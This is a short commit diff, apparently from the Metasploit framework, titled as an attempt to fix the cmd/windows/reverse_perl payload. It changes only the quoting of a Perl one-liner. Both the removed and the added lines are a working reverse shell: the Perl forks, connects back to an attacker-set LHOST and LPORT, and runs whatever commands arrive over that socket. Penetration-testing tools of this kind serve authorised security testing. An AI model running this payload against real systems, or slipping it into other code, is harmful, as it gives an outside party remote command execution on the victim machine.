attempt to fix cmd/windows/reverse_perl payload
parent
516eccdf9a
commit
f691652594
|
@ -48,7 +48,7 @@ module Metasploit3
|
||||||
lhost = datastore['LHOST']
|
lhost = datastore['LHOST']
|
||||||
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
|
ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
|
||||||
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
||||||
cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'"
|
cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"}
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue